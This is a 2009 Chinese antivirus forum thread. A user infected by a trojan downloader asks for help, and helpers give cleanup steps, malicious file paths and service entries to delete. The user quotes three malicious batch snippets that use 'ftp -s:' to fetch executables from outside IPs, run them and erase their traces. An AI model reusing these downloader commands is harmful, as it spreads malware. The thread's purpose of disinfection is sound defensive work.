瑞星卡卡安全论坛

附件: system32病毒.rar (2009-2-27 21:32:35, 34.44 K)
该附件被下载次数 253

定时从用FTP.EXE从 61.191.57.35    61.147.110.108  下载木马  我现在用防火墙把FTP.EXE禁止了!

      哎  烦啊    救救我吧!

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)

第1个P处理
ftp -s:setuplp.sys
start C:\setuplp.exe
del setuplp.sys
del %0

第2
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
  第3

ftp -s:yantou.sys
start C:\WINDOWS\\tcpsvr1.exe
start C:\WINDOWS\\tcpsvr2.exe
start C:\WINDOWS\\tcpsvr3.exe
del yantou.sys
del %0

将ftp.exe文件更名即可。

Sreng官方下载
SREng/智能扫描(记得勾选“检查进程的数字签名)
等扫描完成,保存日志(LOG格式)
PS：如主程序SREng**.exe无法运行,导致无法扫描日志
将主程序改名为我爱小狮子.bat
或我爱小狮子.scr
日志放入附件
（点击我这贴右下角的“引用”或最右下角的那个较大的“回复”然后就应该知道怎么发了。）

将ftp.exe文件更名即可。 ???  大哥!什么意思啊!  我用防火墙拦截了!现在应该更ftp.EXE  没有关系了把!

天知道。。。。。。。
日志发上来看看

你是什么防火墙？

瑞星 2009  杀毒 + 防火墙啊  !

日志贴上来

瑞星防火墙要+规则包

  晕  自动运行  删了  不要好久又自动运行个CMD.EXE  就又有了

附件: 扫描报告.log (2009-2-27 22:06:12, 74.03 K)
该附件被下载次数 243

  报告来了

  自动连接这些地址!

..................


楼主中过在线修复

1.建议使用XDelBox删除以下文件：(XDelBox1.8下载)
使用说明：删除时复制所有要删除文件的路径，在待删除文件列表里点击右键选择从剪贴板导入，导入后在要删除文件上点击右键，（在待删除文件列表里点击右键选择从剪贴板导入不检查路径，）选择立刻重启删除，电脑会重启进入DOS界面进行删除操作。运行xdelbox前最好卸载所有可移动存储介质（包括U盘，MP3，手机存储卡等）。


c:Windows\system32\oymhfi.dll
c:\windows\system32\dxdwcl.dll
c:\windows\system32\mcrpjb.dll
c:\windows\system32\tttwez.fsl
c:\windows\system32\vuwjoh.dll
c:\windows\system32\dathue.dll
c:\windows\fonts\a1845c9e.exe
c:\windows\j9vt5chcggbb.exe


2.删除重启后使用SREng修复下面各项：

    启动项目 －－ 注册表之如下项删除：

[Windows Virtual Assistance]    <hpms2wtn.exe>
[soft]    <; c:\Softsetup.exe>


    启动项目 －－ 服务 －－ Win32服务应用程序之如下项删除：
  (勾选隐藏已认证的微软项目,选中有问题的驱动/服务后，点"删除服务"，点"设置"按钮即可。注意弹出的窗口中要点"否"才是确认删除服务）

[socr / socr]    <C:\WINDOWS\system32\svchost.exe -k socr-->%SystemRoot%\System32\oymhfi.dll>
[skctrp / skctrp]    <C:\WINDOWS\system32\svchost.exe -k skctrp-->%SystemRoot%\System32\dxdwcl.dll>
[qhddcj / qhddcj]    <C:\WINDOWS\system32\svchOST.Exe -kqhddcj-->%SYSTEMROOT%\SYSTEM32\mcrpjb.DLL>
[diqgda / diqgda]    <C:\WINDOWS\system32\svchost.exe -k diqgda-->%SystemRoot%\System32\vuwjoh.dll>
[bixdct / bixdct]    <C:\WINDOWS\system32\svchost.exe -k bixdct-->%SystemRoot%\System32\dathue.dll>
[DC9952A6 / DC9952A6]    <C:\WINDOWS\Fonts\A1845C9E.EXE -k>
[0S0JB5N29R / 0S0JB5N29R]    <C:\WINDOWS\J9VT5CHCGGBB.exe -AW8AZKQFO>

系统修复-高级修复-自动修复（高强修复级别）

楼主是病毒常客。。。。。。。。

为了少中点毒

http://bbs.hzva.org/forumdisplay.php?fid=151&page=1
赶紧去这里安装规则包吧

1.安装前先看相关注意事项
2.规则包不定期更新
请定时关注论坛更新

aaccbbdd 这是什么病毒啊

感觉是黑客后门

是的  我的是2003    老是有人控制  以前中过黑洞

但是我电脑2008年1月8号就没有用过了  到昨天才使用!为什么瑞星杀不了啊!难道是病毒在自动更新|?  但是一个病毒玉米或者IP  能够用这么久啊!

Cn99QDNS]    <C:\Program Files\cn99qdns\Cn99qdns.exe>
这个是正常的  我用的动态域名啊

不排除病毒自动更新

先看12.13楼

c:\program files\cn99qdns\cn99qdns.exe
这个就不要删了吧 我用的动态域名

呵呵
已改正

刚刚和剑盟的朋友还讨论这个来着

c:Windows\system32\oymhfi.dll
c:\windows\system32\dxdwcl.dll
c:\windows\system32\mcrpjb.dll
c:\windows\system32\tttwez.fsl
c:\windows\system32\vuwjoh.dll
c:\windows\system32\dathue.dll
c:\windows\fonts\a1845c9e.exe
c:\windows\j9vt5chcggbb.exe
这里文件我找了没有了啊

[socr / socr]    <C:\WINDOWS\system32\svchost.exe -k socr-->%SystemRoot%\System32\oymhfi.dll>
[skctrp / skctrp]    <C:\WINDOWS\system32\svchost.exe -k skctrp-->%SystemRoot%\System32\dxdwcl.dll>
[qhddcj / qhddcj]    <C:\WINDOWS\system32\svchOST.Exe -kqhddcj-->%SYSTEMROOT%\SYSTEM32\mcrpjb.DLL>
[diqgda / diqgda]    <C:\WINDOWS\system32\svchost.exe -k diqgda-->%SystemRoot%\System32\vuwjoh.dll>
[bixdct / bixdct]    <C:\WINDOWS\system32\svchost.exe -k bixdct-->%SystemRoot%\System32\dathue.dll>
[DC9952A6 / DC9952A6]    <C:\WINDOWS\Fonts\A1845C9E.EXE -k>
[0S0JB5N29R / 0S0JB5N29R]    <C:\WINDOWS\J9VT5CHCGGBB.exe -AW8AZKQFO>

象  这些\dathue.dll    DLL文件也没有啊

务必勾选XDELBOX里的抑制再生删除一次

aaccbbdd    快救命!晕

哦  我没有下XDELBOX  我是在文件里面没有找到

我现在把IE 下栽关了

..............下载XDELBOx
选择抑制再生模式删除一次看看情况

因为我电脑好久没有用了    所以我18点的时候按修改时间 把 2009.02.26  27 的文件删除了

哦 好咯